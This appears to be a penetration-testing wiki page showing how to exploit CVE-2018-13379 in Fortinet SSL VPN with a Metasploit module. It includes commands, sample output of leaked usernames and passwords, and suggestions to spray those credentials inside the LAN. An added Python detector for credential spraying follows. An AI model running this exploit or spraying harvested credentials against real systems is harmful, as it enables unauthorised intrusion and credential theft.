Fortinet SSL VPN Path Traversal: Difference between revisions
Revision as of 09:17, 5 July 2023
Exploiting CVE-2018-13379 Forti SSL VPN
Exploiting CVE-2018-13379 allows us to gain credentials to the target's VPN. With those credentials, there are a few main ways to gain access beyond the Forti VPN console:
- Look for Bookmarks in the VPN console that have internal addresses and credentials already saved
- Connect to the Forti VPN client locally (Windows server via RDP), scan the LAN for systems, and then spray the VPN credentials as explained here
- Scan the LAN for vulnerabilities which we can exploit to gain further access into the network
To exploit CVE-2018-13379 we'll use Metasploit, as it formats the credentials nicely for us. Start the database and run it:
- sudo systemctl start postgresql
- msfdb init
Start msfconsole:
    user@host:~$ msfconsole
    StArting the Metasploit Framework console...
Search for and use the module for CVE-2018-13379:
    msf6 > search CVE-2018-13379

    Matching Modules
    ================

       #  Name                                                  Disclosure Date  Rank    Check  Description
       -  ----                                                  ---------------  ----    -----  -----------
       0  auxiliary/gather/fortios_vpnssl_traversal_creds_leak                   normal  No     FortiOS Path Traversal Credential Gatherer

    Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leak

    msf6 > use 0
    msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
Set your targets:
    msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt
    RHOSTS => file:targets.txt
Run the exploit module!
    msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run
    [*] https://10.10.10.11:10443 - Trying to connect.
    [+] https://10.10.10.11:10443 - Vulnerable!
View the credentials:
    msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
    Credentials
    ===========

    host         origin       service            public       private     realm  private_type  JtR Format
    ----         ------       -------            ------       -------     -----  ------------  ----------
    10.10.10.11  10.10.10.11  10443/tcp (https)  admin        8401327            Password
    10.10.10.12  10.10.10.12  10443/tcp (https)  cvilleneuve  3264012            Password
    10.10.10.13  10.10.10.13  10443/tcp (https)  vdujardin    Jouv2018$          Password
    10.10.10.14  10.10.10.14  10443/tcp (https)  montechti    Thomas2005         Password
    10.10.10.15  10.10.10.15  10443/tcp (https)  hvac         Winter2022         Password
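From the defender's side, the credential spraying mentioned in the list above leaves a recognisable trace: one SSL VPN client address trying the same account against many internal hosts in a short time. The following is an added example, not part of the original wiki page, that flags this pattern in authentication logs; the VPN address pool, the thresholds and the log layout are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumptions (not from the page): SSL VPN client pool, thresholds, log layout.
VPN_POOL = ip_network("10.212.134.0/24")
WINDOW = timedelta(minutes=10)
MIN_HOSTS = 4  # distinct internal targets per (source, account) before alerting

# Constructed sample lines: "<ISO time> <src> <dst> <user> <OK|FAIL>"
SAMPLE_LOG = """\
2023-07-05T09:00:01 10.212.134.7 10.10.20.11 hvac FAIL
2023-07-05T09:00:40 10.212.134.7 10.10.20.12 hvac FAIL
2023-07-05T09:01:15 10.212.134.7 10.10.20.13 hvac OK
2023-07-05T09:02:30 10.212.134.7 10.10.20.14 hvac FAIL
2023-07-05T09:05:00 10.212.134.9 10.10.20.11 cvilleneuve OK
2023-07-05T09:06:00 10.212.134.9 10.10.20.12 cvilleneuve OK
2023-07-05T09:00:00 10.212.134.8 10.10.20.11 montechti OK
2023-07-05T09:40:00 10.212.134.8 10.10.20.12 montechti OK
2023-07-05T10:20:00 10.212.134.8 10.10.20.13 montechti OK
2023-07-05T11:00:00 10.212.134.8 10.10.20.14 montechti OK
2023-07-05T09:00:05 10.10.30.5 10.10.20.11 admin FAIL
2023-07-05T09:00:06 10.10.30.5 10.10.20.12 admin FAIL
2023-07-05T09:00:07 10.10.30.5 10.10.20.13 admin FAIL
2023-07-05T09:00:08 10.10.30.5 10.10.20.14 admin FAIL
"""

def parse(log):
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines
        ts, src, dst, user, result = parts
        yield datetime.fromisoformat(ts), ip_address(src), dst, user, result

def find_spray(log, pool=VPN_POOL, window=WINDOW, min_hosts=MIN_HOSTS):
    """Return sorted (src, user) pairs seen on >= min_hosts hosts within window."""
    events = defaultdict(list)
    for ts, src, dst, user, _result in parse(log):
        # Successes count too: a reused VPN password may simply work.
        if src in pool:
            events[(str(src), user)].append((ts, dst))
    hits = []
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding time window over sorted events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({d for _, d in evs[start:end + 1]}) >= min_hosts:
                hits.append(key)
                break
    return sorted(hits)
```

Tune the pool, window and host threshold to the environment; jump hosts and management servers that legitimately reach many systems need an allowlist.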